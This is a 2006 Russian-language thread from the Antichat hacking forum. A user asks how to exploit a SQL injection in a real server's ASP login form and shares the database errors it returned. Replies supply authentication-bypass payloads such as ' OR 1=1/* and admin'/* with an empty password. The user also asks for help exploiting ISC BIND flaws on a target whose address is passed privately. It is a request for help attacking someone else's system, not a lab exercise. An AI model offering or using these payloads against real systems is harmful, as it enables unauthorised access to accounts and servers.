Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

29.04.2006, 11:57
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме: 1347867
Репутация:
408
|
|
помогите с sql inj
Вообщем есть сервер, на нем есть страничка ASP на которой стандартная форма login  ass
опробовал я ее на скуль
login: ' or '
pass: 123
ответ
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '123'.
/asp/members.asp, line 94
login: 123
pass: ' or '
Код:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string 'or ') AND (approve = 1)'.
/asp/members.asp, line 94
Вот........ только вот не пойму, что с этого можно поиметь, если учесть то, что каждый пользователь в системе имеет RANDOM логин, то есть логина админа я не знаю...
|
|
|

29.04.2006, 12:20
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
а так:
login'*/
а пасс пустой кажется..
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

29.04.2006, 12:23
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме: 1347867
Репутация:
408
|
|
а так же что можно, а точнее как можно что то поиметь с этого?
Обнаружено несколько уязвимостей в ISC Bind.
1. Возможно выполнение произвольного кода из-за ошибки при обработке запроса, содержащего неправильный параметр ключа в записи TSIG. Атакующий может переполнить стек и выполнить произвольный код на уязвимой системе.
2. Удаленный атакующий может получить доступ на чтение переменных окружения из стека с помощью специально сформированного рекурсивного запроса.
3. Возможен отказ в обслуживании. Обнаружена ошибка при переносах зон ZXFR. Удаленный атакующий может запросить ZXFR, которая не существует в кеше сервера имен, что приведет к аварийной остановке службы.
если кто знает - пишите.... оч надо =(
|
|
|

29.04.2006, 12:27
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
дал бы ссылку, было бы еще легче.
1.Найди, где там Tsig.
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

29.04.2006, 12:46
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме: 1347867
Репутация:
408
|
|
Ссылка в ЛС
|
|
|

29.04.2006, 15:21
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме: 941818
Репутация:
569
|
|
да все просто, если там не слешируются или не фильтруются ковычки, то в логин либо
' OR 1=1/*
и пасс пустой, либо как предлогал монстр, подбирать логины
admin'/*
root'/*
итп и пасс пустой, либо
' OR '1'='1
в оба поля и авторизуешься с первой учетной записью в БД
Последний раз редактировалось Trinux; 29.04.2006 в 16:53..
|
|
|

29.04.2006, 17:19
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
никакой не пашет...только при ' or ' выводит ошибку и запрос , а при других просто говоит, что ошибка в таком-то скрипте.
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

29.04.2006, 22:28
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме: 1347867
Репутация:
408
|
|
|
|
|

10.05.2006, 14:38
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
Закрыто.Решение готово %)
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|